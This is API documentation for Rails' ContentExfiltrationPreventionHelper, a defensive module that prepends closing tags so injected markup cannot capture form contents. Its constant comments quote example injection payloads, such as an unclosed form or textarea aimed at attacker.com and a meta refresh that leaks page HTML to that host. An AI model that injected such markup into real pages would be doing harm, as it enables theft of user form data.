Module: ActionView::Helpers::ContentExfiltrationPreventionHelper

Relationships & Source Files
Extension / Inclusion / Inheritance Descendants
Included In: ActionDispatch::DebugView, `::ActionView::Base`, `::ActionView::Helpers`, `FormHelper`, `FormTagHelper`, ActionView::Helpers::Tags::Base, ActionView::Helpers::Tags::CheckBox, ActionView::Helpers::Tags::CollectionCheckBoxes, ActionView::Helpers::Tags::CollectionRadioButtons, ActionView::Helpers::Tags::CollectionSelect, ActionView::Helpers::Tags::ColorField, ActionView::Helpers::Tags::DateField, ActionView::Helpers::Tags::DateSelect, ActionView::Helpers::Tags::DatetimeField, ActionView::Helpers::Tags::DatetimeLocalField, ActionView::Helpers::Tags::DatetimeSelect, ActionView::Helpers::Tags::EmailField, ActionView::Helpers::Tags::FileField, ActionView::Helpers::Tags::GroupedCollectionSelect, ActionView::Helpers::Tags::HiddenField, ActionView::Helpers::Tags::Label, ActionView::Helpers::Tags::MonthField, ActionView::Helpers::Tags::NumberField, ActionView::Helpers::Tags::PasswordField, ActionView::Helpers::Tags::RadioButton, ActionView::Helpers::Tags::RangeField, ActionView::Helpers::Tags::SearchField, ActionView::Helpers::Tags::Select, ActionView::Helpers::Tags::TelField, ActionView::Helpers::Tags::TextArea, ActionView::Helpers::Tags::TextField, ActionView::Helpers::Tags::TimeField, ActionView::Helpers::Tags::TimeSelect, ActionView::Helpers::Tags::TimeZoneSelect, ActionView::Helpers::Tags::UrlField, ActionView::Helpers::Tags::WeekField, ActionView::Helpers::Tags::WeekdaySelect, `UrlHelper`, `::ActionView::TestCase`, `::ActionView::TestCase::Behavior`
Defined in:	actionview/lib/action_view/helpers/content_exfiltration_prevention_helper.rb

Constant Summary

CLOSE_CDATA_COMMENT =
Close any open tags that support CDATA (textarea, xmp) before each form tag. This prevents attackers from injecting unclosed tags that could capture form contents.

For example, an attacker might inject:
```
<form action="https://attacker.com"><textarea>
```
The HTML following this tag, up until the next </textarea> or the end of the document would be captured by the attacker’s <textarea>. By closing any open textarea tags, we ensure that form contents are never exfiltrated.
# File 'actionview/lib/action_view/helpers/content_exfiltration_prevention_helper.rb', line 32
```
"".html_safe.freeze
```
CLOSE_FORM_TAG =
Close any open form tags before each new form tag. This prevents attackers from injecting unclosed forms that could leak markup offsite.

For example, an attacker might inject:
```
<form action="https://attacker.com">
```
The form elements following this tag, up until the next </form> would be captured by the attacker’s <form>. By closing any open form tags, we ensure that form contents are never exfiltrated.
# File 'actionview/lib/action_view/helpers/content_exfiltration_prevention_helper.rb', line 57
```
"</form>".html_safe.freeze
```
CLOSE_OPTION_TAG =
Close any open option tags before each form tag. This prevents attackers from injecting unclosed options that could leak markup offsite.

For example, an attacker might inject:
```
<form action="https://attacker.com"><option>
```
The HTML following this tag, up until the next </option> or the end of the document would be captured by the attacker’s <option>. By closing any open option tags, we ensure that form contents are never exfiltrated.
# File 'actionview/lib/action_view/helpers/content_exfiltration_prevention_helper.rb', line 45
```
"</option>".html_safe.freeze
```
CLOSE_QUOTES_COMMENT =
Close any open attributes before each form tag. This prevents attackers from injecting partial tags that could leak markup offsite.

For example, an attacker might inject:
```
<meta http-equiv="refresh" content='0;URL=https://attacker.com?
```
The HTML following this tag, up until the next single quote would be sent to https://attacker.com. By closing any open attributes, we ensure that form contents are never exfiltrated this way.
# File 'actionview/lib/action_view/helpers/content_exfiltration_prevention_helper.rb', line 18
```
%q().html_safe.freeze
```
CONTENT_EXFILTRATION_PREVENTION_MARKUP =
# File 'actionview/lib/action_view/helpers/content_exfiltration_prevention_helper.rb', line 59
```
(CLOSE_QUOTES_COMMENT + CLOSE_CDATA_COMMENT + CLOSE_OPTION_TAG + CLOSE_FORM_TAG).freeze
```

Class Attribute Summary

.prepend_content_exfiltration_prevention (also: #prepend_content_exfiltration_prevention) rw

Instance Attribute Summary

#prepend_content_exfiltration_prevention rw

Instance Method Summary

#prevent_content_exfiltration(html)

Class Attribute Details

.prepend_content_exfiltration_prevention (rw) Also known as: #prepend_content_exfiltration_prevention

[ GitHub ]

# File 'actionview/lib/action_view/helpers/content_exfiltration_prevention_helper.rb', line 6


mattr_accessor :prepend_content_exfiltration_prevention, default: false

Instance Attribute Details

#prepend_content_exfiltration_prevention (rw)

[ GitHub ]

# File 'actionview/lib/action_view/helpers/content_exfiltration_prevention_helper.rb', line 6


mattr_accessor :prepend_content_exfiltration_prevention, default: false

Instance Method Details

#prevent_content_exfiltration(html)

[ GitHub ]

# File 'actionview/lib/action_view/helpers/content_exfiltration_prevention_helper.rb', line 61


def prevent_content_exfiltration(html)
  if prepend_content_exfiltration_prevention
    CONTENT_EXFILTRATION_PREVENTION_MARKUP + html
  else
    html
  end
end